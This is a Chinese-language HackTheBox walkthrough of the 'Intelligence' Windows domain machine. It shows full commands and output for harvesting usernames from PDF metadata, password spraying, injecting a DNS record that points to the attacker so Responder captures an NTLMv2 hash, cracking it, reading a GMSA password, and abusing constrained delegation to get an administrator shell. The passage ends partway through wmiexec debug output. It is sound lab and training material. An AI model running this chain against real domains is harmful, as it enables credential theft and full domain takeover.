intelligence (htb)

类型:AD 域控渗透 / Windows | 难度:中等

0x00 总结

1️⃣ 入口 — PDF 元数据信息泄露

  • 网站 /documents/ 目录下发现按日期命名的 PDF
  • 写脚本批量下载 100 份 PDF
  • exiftool 提取 Creator 元数据 → 拿到 30 个域名户名
  • pdfgrep 找到内嵌凭据 NewIntelligenceCorpUser9876
  • 密码喷洒命中 Tiffany.Molina

2️⃣ 横向 — DNS 劫持钓鱼

  • SMB 发现 IT 共享下的 downdetector.ps1 — 每 5 分钟通过 DNS 记录查 Web 状态
  • 用 dnstool.py 写入一条恶意的 A 记录指向 Kali
  • 启动 Responder 静候 — 截获 Ted.Graves 的 NTLMv2 Hash
  • hashcat + rockyou 秒破 → Mr.Teddy

3️⃣ 提权 — GMSA + 约束委派攻击

  • Ted.Graves 有读取 GMSA 密码的权限 → 拿到 svc_int$ 的 NTLM
  • svc_int$ 配置了「约束委派 + 协议转换」允许冒充任意用户到 WWW/dc.intelligence.htb
  • getST -impersonate administrator → 拿到 Administrator 的 Kerberos 票据
  • wmiexec -k → Domain Admin shell,拿下双 Flag

0x01 初步信息收集

1.1端口扫描

nmap 端口扫描

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ nmap -p- 10.129.95.154 --min-rate 1000 -oA nmapscan/portscan
Starting Nmap 7.95 ( https://nmap.org ) at 2026-07-06 20:46 EDT
Nmap scan report for 10.129.95.154
Host is up (0.093s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49691/tcp open  unknown
49692/tcp open  unknown
49710/tcp open  unknown
49714/tcp open  unknown
49737/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 108.26 seconds 

1.2 web 信息收集

1.2.1 目录扫描

feroxbuster 进行目录扫描

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ feroxbuster -u http://10.129.95.154/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.129.95.154/
 🚩  In-Scope Url          │ 10.129.95.154
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       29l       95w     1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       56l      165w     1850c http://10.129.95.154/documents/scripts.js
200      GET        1l       44w     2532c http://10.129.95.154/documents/jquery.easing.min.js
200      GET        8l       29w    28898c http://10.129.95.154/documents/favicon.ico
200      GET      106l      659w    26989c http://10.129.95.154/documents/demo-image-01.jpg
200      GET      209l      800w    48542c http://10.129.95.154/documents/2020-12-15-upload.pdf
200      GET      208l      768w    47856c http://10.129.95.154/documents/2020-01-01-upload.pdf
200      GET        2l     1297w    89476c http://10.129.95.154/documents/jquery.min.js
200      GET        7l     1031w    84152c http://10.129.95.154/documents/bootstrap.bundle.min.js
200      GET      492l     2733w   186437c http://10.129.95.154/documents/demo-image-02.jpg
301      GET        2l       10w      154c http://10.129.95.154/documents => http://10.129.95.154/documents/
403      GET       29l       92w     1233c http://10.129.95.154/documents/
200      GET    10345l    19793w   190711c http://10.129.95.154/documents/styles.css
200      GET        5l   108280w  1194960c http://10.129.95.154/documents/all.js
200      GET      129l      430w     7432c http://10.129.95.154/
301      GET        2l       10w      154c http://10.129.95.154/Documents => http://10.129.95.154/Documents/
[####################] - 7m    661657/661657  0s      found:15      errors:0
[####################] - 7m    220546/220546  501/s   http://10.129.95.154/
[####################] - 7m    220546/220546  501/s   http://10.129.95.154/documents/
[####################] - 7m    220546/220546  501/s   http://10.129.95.154/Documents/ 

可以看到 这两个文件

http://10.129.95.154/documents/2020-12-15-upload.pdf
http://10.129.95.154/documents/2020-01-01-upload.pdf

他们的格式按日期编号,有理由怀疑有更多的日期编号

1.2.2 编写脚本批量下载文件

于是我写了个脚本用来检测和下载所有的文件

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ cat donwload 
#!/bin/bash

# ---------- 配置 ----------
base_url='http://10.129.95.154/documents/'                 # 靶机地址,IP 换成你的
cookie='PHPSESSID=xxxxxxxx'                 # 你的登录会话 ID
out_dir='pdf_downloads'                     # 下载到哪个文件夹

# ---------- 准备 ----------
mkdir -p "$out_dir"                         # -p 确保文件夹存在,不报错
start='2020-01-01'
end='2021-12-31'                            # 要尝试到哪天
d="$start"

# ---------- 主循环 ----------
while [ "$d" != $(date -d "$end + 1 day" +%F) ]; do
  # 构造文件名和路径
  filename="${d}-upload.pdf"
  filepath="${out_dir}/${filename}"
  
  # -s 检查文件是否已存在且不为空,如果是就跳过
  if [ -s "$filepath" ]; then
    echo "[跳过] $filename 已存在"
    d=$(date -d "$d + 1 day" +%F)           # 日期递增
    continue                                 # 跳过后面的代码,直接下一次循环
  fi

  url="${base_url}/${filename}"
  echo -n "尝试 $filename ... "             # -n 不换行,等一会儿后面会输出状态

  # 用 curl 悄悄请求,只取状态码
    # 构造 URL(base_url 末尾无 /,这里补上)
  url="${base_url}/${filename}"
  echo -n "尝试 $filename ... "

  # 用 curl 悄悄请求,只取状态码(一行搞定)
  http_code=$(curl -s -o /dev/null -w "%{http_code}" --header "Cookie: $cookie" -L "$url")
  if [ "$http_code" = "200" ]; then
    echo "存在,下载中..."
    # 下载文件,安静模式,指定存放文件夹
    wget --header="Cookie: $cookie" -q -P "$out_dir" "$url"
  else
    echo "未找到 (HTTP $http_code)"
  fi

  # 日期加一天,准备下次循环
  d=$(date -d "$d + 1 day" +%F)
  sleep 0.2                                 # 休息 0.2 秒,做个好公民
done

echo "全部完成。PDF 存在 $out_dir 里。"

进入目录里后统计一下信息
总共 100

┌──(kali㉿kali)-[~/htb/Intelligence/pdf_downloads]
└─$ ls -lsih |wc -l
100

1.2.3 文件分析

先对几个文件用 exiftool 检查元数据

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ exiftool 2020-01-01-upload.pdf
ExifTool Version Number         : 13.36
File Name                       : 2020-01-01-upload.pdf
Directory                       : .
File Size                       : 27 kB
File Modification Date/Time     : 2026:07:06 21:48:16-04:00
File Access Date/Time           : 2026:07:06 21:48:16-04:00
File Inode Change Date/Time     : 2026:07:06 21:48:16-04:00
File Permissions                : -rw-rw-r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 1
Creator                         : William.Lee                                      

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ exiftool 2020-12-15-upload.pdf
ExifTool Version Number         : 13.36
File Name                       : 2020-12-15-upload.pdf
Directory                       : .
File Size                       : 27 kB
File Modification Date/Time     : 2026:07:06 21:47:46-04:00
File Access Date/Time           : 2026:07:06 21:47:46-04:00
File Inode Change Date/Time     : 2026:07:06 21:47:46-04:00
File Permissions                : -rw-rw-r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 1
Creator                         : Jose.Williams

可以看到 Creator 这栏泄露了用户名
我们批量筛选用户名并且写入文件

┌──(kali㉿kali)-[~/htb/Intelligence]                                       
└─$ exiftool -p '$Creator' pdf_downloads/ | sort -u           
    1 directories scanned                                      
   99 image files read                                        
Anita.Roberts                                                 
Brian.Baker                                                     
Brian.Morris                                                    
Daniel.Shelton                                                 
Danny.Matthews
Darryl.Harris                                               
David.Mcbride                                                 
David.Reed
David.Wilson                                                     
Ian.Duncan
Jason.Patterson                                                  
Jason.Wright                                                   
Jennifer.Thomas                                               
Jessica.Moody                                                  
John.Coleman
Jose.Williams
Kaitlyn.Zimmerman                                             
Kelly.Long                                                        
Nicole.Brock
Richard.Williams                                             
Samuel.Richardson                                                
Scott.Scott                                                       
Stephanie.Young                                              
Teresa.Williamson
Thomas.Hall                                                     
Thomas.Valenzuela                                             
Tiffany.Molina                                                  
Travis.Evans                                                 
Veronica.Patel                                          
William.Lee                                             

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ exiftool -p '$Creator' pdf_downloads/ | sort -u >users 
    1 directories scanned
   99 image files read

然后进行预验证

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ impacket-GetNPUsers  intelligence.htb/ -usersfile users -no-pass  -dc-ip 10.129.95.154
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] User Anita.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Brian.Baker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Brian.Morris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Daniel.Shelton doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Danny.Matthews doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Darryl.Harris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User David.Mcbride doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User David.Reed doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User David.Wilson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Ian.Duncan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jason.Patterson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jason.Wright doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jennifer.Thomas doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jessica.Moody doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User John.Coleman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jose.Williams doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kaitlyn.Zimmerman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kelly.Long doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Nicole.Brock doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Richard.Williams doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Samuel.Richardson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Scott.Scott doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Stephanie.Young doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Teresa.Williamson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Thomas.Hall doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Thomas.Valenzuela doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Tiffany.Molina doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Travis.Evans doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Veronica.Patel doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User William.Lee doesn't have UF_DONT_REQUIRE_PREAUTH set

很遗憾这些都没开启预验证
我会尝试去看看每个文件的内容
psdfrep

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ pdfgrep -r -i 'password' pdf_downloads/
pdf_downloads//2020-06-04-upload.pdf:Please login using your username and the default password of:
pdf_downloads//2020-06-04-upload.pdf:After logging in please change your password as soon as possible.

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ 

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ 

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ pdfgrep -r -i 'password\|secret\|confidential\|credential' pdf_downloads/

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ pdfgrep -r -i 'password\|secret\|confidential\|credential' pdf_downloads/

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ pdfgrep -r -i 'passw' pdf_downloads/                                  
pdf_downloads//2020-06-04-upload.pdf:Please login using your username and the default password of:
pdf_downloads//2020-06-04-upload.pdf:After logging in please change your password as soon as possible.

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ pdfgrep -r -i 'pwd' pdf_downloads/

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ pdfgrep -r -i 'user' pdf_downloads/
pdf_downloads//2020-06-04-upload.pdf:Please login using your username and the default password of:
pdf_downloads//2020-06-04-upload.pdf:NewIntelligenceCorpUser9876

我会打开这两个文件
image.png
文件中提到默认密码 NewIntelligenceCorpUser9876

1.2.4 密码喷洒

nxc 做一个密码喷洒

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ nxc smb 10.129.95.154  -u users -p 'NewIntelligenceCorpUser9876'
SMB         10.129.95.154   445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB         10.129.95.154   445    DC               [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         10.129.95.154   445    DC               [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         10.129.95.154   445    DC               [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\Darryl.Harris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\David.Wilson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\Jason.Patterson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\Teresa.Williamson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\Thomas.Hall:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB         10.129.95.154   445    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876

成功获取一组凭据

Tiffany.Molina:NewIntelligenceCorpUser9876

0x02 内网信息收集

2.1 smbbloodhound 信息收集

我们先用 bloodhound 收集域内信息

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ bloodhound-python -c ALL -d intelligence.htb -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -dc dc.intelligence.htb  -ns 10.129.95.154 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: intelligence.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Testing resolved hostname connectivity dead:beef::124
INFO: Trying LDAP connection to dead:beef::124
INFO: Testing resolved hostname connectivity dead:beef::89af:5b16:d018:df92
INFO: Trying LDAP connection to dead:beef::89af:5b16:d018:df92
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to GC LDAP server: dc.intelligence.htb
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Testing resolved hostname connectivity dead:beef::124
INFO: Trying LDAP connection to dead:beef::124
INFO: Testing resolved hostname connectivity dead:beef::89af:5b16:d018:df92
INFO: Trying LDAP connection to dead:beef::89af:5b16:d018:df92
INFO: Found 43 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.intelligence.htb
WARNING: DCE/RPC connection failed: [Errno Connection error (10.129.95.154:445)] timed out
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 02M 52S
INFO: Compressing output into 20260708030949_bloodhound.zip

在枚举的同时查看用户的 smb 共享

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ nxc smb 10.129.95.154  -u Tiffany.Molina -p 'NewIntelligenceCorpUser9876' --shares
SMB         10.129.95.154   445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False) 
SMB         10.129.95.154   445    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
SMB         10.129.95.154   445    DC               [*] Enumerated shares          
SMB         10.129.95.154   445    DC               Share           Permissions     Remark
SMB         10.129.95.154   445    DC               -----           -----------     ------
SMB         10.129.95.154   445    DC               ADMIN$                          Remote Admin
SMB         10.129.95.154   445    DC               C$                              Default share
SMB         10.129.95.154   445    DC               IPC$            READ            Remote IPC
SMB         10.129.95.154   445    DC               IT              READ
SMB         10.129.95.154   445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.95.154   445    DC               SYSVOL          READ            Logon server share 
SMB         10.129.95.154   445    DC               Users           READ

发现 IT 目录可读 用 smbclient 连接

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ smbclient  //10.129.95.154/IT -U intelligence.htb/Tiffany.Molina%NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Apr 18 20:50:55 2021
  ..                                  D        0  Sun Apr 18 20:50:55 2021
  downdetector.ps1                    A     1046  Sun Apr 18 20:50:55 2021

                3770367 blocks of size 4096. 1445071 blocks available
smb: \> get downdetector.ps1 
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> 

发现 downdetector 文件,下载下来分析

2.2 脚本分析

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ cat downdetector.ps1 
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}

发现这个脚本每五分钟运行一次,会读取 dns 中的条目,发送默认凭证
我会先想 Tiffany.Molina 有没有远程登入权限,如果有的话,或许我们可以修改这个脚本
bloodhound 中查看
image.png
没有他的远程管理权限

2.3 dns 劫持

考虑到他读取 dns 记录发送凭证验证,考虑使用 dns 劫持,让靶机向 kali 发送凭证
使用 krbrelayx 中的 dnstool.py
先下载

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ git clone https://github.com/dirkjanm/krbrelayx.git
cd krbrelayx
Cloning into 'krbrelayx'...
remote: Enumerating objects: 270, done.
remote: Counting objects: 100% (131/131), done.
remote: Compressing objects: 100% (57/57), done.
remote: Total 270 (delta 104), reused 74 (delta 74), pack-reused 139 (from 2)
Receiving objects: 100% (270/270), 114.20 KiB | 40.00 KiB/s, done.
Resolving deltas: 100% (151/151), done.

然后向目标靶机的 dns 解析中写入记录

┌──(kali㉿kali)-[~/htb/Intelligence/krbrelayx]
└─$ python3 dnstool.py -u intelligence.htb\\Tiffany.Molina -p NewIntelligenceCorpUser9876 -dc-ip 10.129.95.154   -a add -d 10.10.16.20 -r webcom1 10.129.95.154
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

查询是否加入成功

┌──(kali㉿kali)-[~/htb/Intelligence/krbrelayx]
└─$ python3 dnstool.py -u intelligence.htb\\Tiffany.Molina -p NewIntelligenceCorpUser9876 -dc-ip 10.129.95.154  -a query -r webcom1 10.129.95.154 
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found record webcom1
DC=webcom1,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
[+] Record entry:
 - Type: 1 (A) (Serial: 503)
 - Address: 10.10.16.20

然后启动 reponder

┌──(kali㉿kali)-[~/htb/Intelligence]
└─$ sudo responder -I tun0

这样当他运行脚本时应该会向 kali 发送凭证
几分钟后,我们能收到拦截的凭证

[HTTP] NTLMv2 Client   : 10.129.95.154
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash     : Ted.Graves::intelligence:fbc071d1ba245987:DE6AC552D84A19A6556E417AA1F6E1A1:01010000000000004B192A0D160FDD01DE920284FEA763820000000002000800310034005A00550001001E00570049004E002D0032005200490045005800590053004500440057004E0004001400310034005A0055002E004C004F00430041004C0003003400570049004E002D0032005200490045005800590053004500440057004E002E00310034005A0055002E004C004F00430041004C0005001400310034005A0055002E004C004F00430041004C000800300030000000000000000000000000200000C423A557E1BAC004B7F13787935B69E956F02C6F2A901FCC1A298F30129FE67C0A0010000000000000000000000000000000000009003A0048005400540050002F0077006500620063006F006D0031002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000

hashcat 破解

┌──(kali㉿kali)-[~/htb/Intelligence/krbrelayx] 
└─$ hashcat -m 5600 ../hash /usr/share/wordlists/rockyou.txt

得到

TED.GRAVES::intelligence:fbc071d1ba245987:de6ac552d84a19a6556e417aa1f6e1a1:01010000000000004b192a0d160fdd01de920284fea763820000000002000800310034005a00550001001e00570049004e002d0032005200490045005800590053004500440057004e0004001400310034005a0055002e004c004f00430041004c0003003400570049004e002d0032005200490045005800590053004500440057004e002e00310034005a0055002e004c004f00430041004c0005001400310034005a0055002e004c004f00430041004c000800300030000000000000000000000000200000c423a557e1bac004b7f13787935b69e956f02c6f2a901fcc1a298f30129fe67c0a0010000000000000000000000000000000000009003a0048005400540050002f0077006500620063006f006d0031002e0069006e00740065006c006c006900670065006e00630065002e006800740062000000000000000000:Mr.Teddy

这样拿到一组新凭据 TED.GRAVES:Mr.Teddy

0x03 提权 约束委派攻击

bloodhound 中查看
image.png
发现 TED.GRAVES 在提权路径上
首先显示了 ted.graver的所在组有 对 `svc_intgmsapassword的阅读权限
我们用 nxc 阅读

┌──(kali㉿kali)-[~/htb/Intelligence/krbrelayx]
└─$ nxc ldap 10.129.95.154 -u TED.GRAVES -p Mr.Teddy --gmsa           
LDAP        10.129.95.154   389    DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:intelligence.htb)
LDAPS       10.129.95.154   636    DC               [+] intelligence.htb\TED.GRAVES:Mr.Teddy 
LDAPS       10.129.95.154   636    DC               [*] Getting GMSA Passwords
LDAPS       10.129.95.154   636    DC               Account: svc_int$             NTLM: 51854c912c4caa549034deb480ca8e75     PrincipalsAllowedToReadPassword: ['DC$', 'itsupport']

获得一组新凭据 svc_int:51854c912c4caa549034deb480ca8e75
然后 svc_int 有对计算机的委派权限
我们先用 findDelegation 查看一下具体信息

┌──(kali㉿kali)-[~/htb/Intelligence/krbrelayx]
└─$ impacket-findDelegation intelligence.htb/'svc_int$' -hashes ':51854c912c4caa549034deb480ca8e75' -dc-ip 10.129.95.154
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

AccountName  AccountType                          DelegationType                      DelegationRightsTo       SPN Exists 
-----------  -----------------------------------  ----------------------------------  -----------------------  ----------
DC$          Computer                             Unconstrained                       N/A                      Yes        
svc_int$     ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  WWW/dc.intelligence.htb  No 

允许委派到 www/dc.intelligence.htb ,并且 w/ Protocol Transition 开启了协议转换,那就很简单了
先同步下时间

┌──(kali㉿kali)-[~/htb/Intelligence/krbrelayx]
└─$ sudo ntpdate -u 10.129.95.154
2026-07-08 17:11:38.990312 (-0400) +25191.689137 +/- 0.177599 10.129.95.154 s1 no-leap
CLOCK: time stepped by 25191.689137

再用 getST 去申请冒充的票据

┌──(kali㉿kali)-[~/htb/Intelligence/krbrelayx]
└─$ impacket-getST intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -impersonate administrator -hashes ':51854c912c4caa549034deb480ca8e75'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache 

导入票据

┌──(kali㉿kali)-[~/htb/Intelligence/krbrelayx]                                    
└─$ export KRB5CCNAME=administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache

使用票据登入

┌──(kali㉿kali)-[~/htb/Intelligence/krbrelayx]
└─$ impacket-wmiexec  intelligence.htb/administrator@dc.intelligence.htb -k -debug
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
Password:
[+] Using Kerberos Cache: administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache
[+] SPN CIFS/DC.INTELLIGENCE.HTB@INTELLIGENCE.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for WWW/DC.INTELLIGENCE.HTB@INTELLIGENCE.HTB
[+] Using TGS from cache
[+] Changing sname from WWW/dc.intelligence.htb@INTELLIGENCE.HTB to CIFS/DC.INTELLIGENCE.HTB@INTELLIGENCE.HTB and hoping for the best
[*] SMBv3.0 dialect used
[+] Using Kerberos Cache: administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache
[+] SPN HOST/DC.INTELLIGENCE.HTB@INTELLIGENCE.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for WWW/DC.INTELLIGENCE.HTB@INTELLIGENCE.HTB
[+] Using TGS from cache
[+] Changing sname from WWW/dc.intelligence.htb@INTELLIGENCE.HTB to HOST/DC.INTELLIGENCE.HTB@INTELLIGENCE.HTB and hoping for the best
[+] Target system is dc.intelligence.htb and isFQDN is True
[+] StringBinding: dc[60380]
[+] StringBinding chosen: ncacn_ip_tcp:dc.intelligence.htb[60380]
[+] Using Kerberos Cache: administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache
[+] SPN HOST/DC.INTELLIGENCE.HTB@INTELLIGENCE.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for WWW/DC.INTELLIGENCE.HTB@INTELLIGENCE.HTB
[+] Using TGS from cache
[+] Changing sname from WWW/dc.intelligence.htb@INTELLIGENCE.HTB to HOST/DC.INTELLIGENCE.HTB@INTELLIGENCE.HTB and hoping for the best
[+] Using Kerberos Cache: administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache
[+] SPN HOST/DC.INTELLIGENCE.HTB@INTELLIGENCE.HTB not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for WWW/DC.INTELLIGENCE.HTB@INTELLIGENCE.HTB
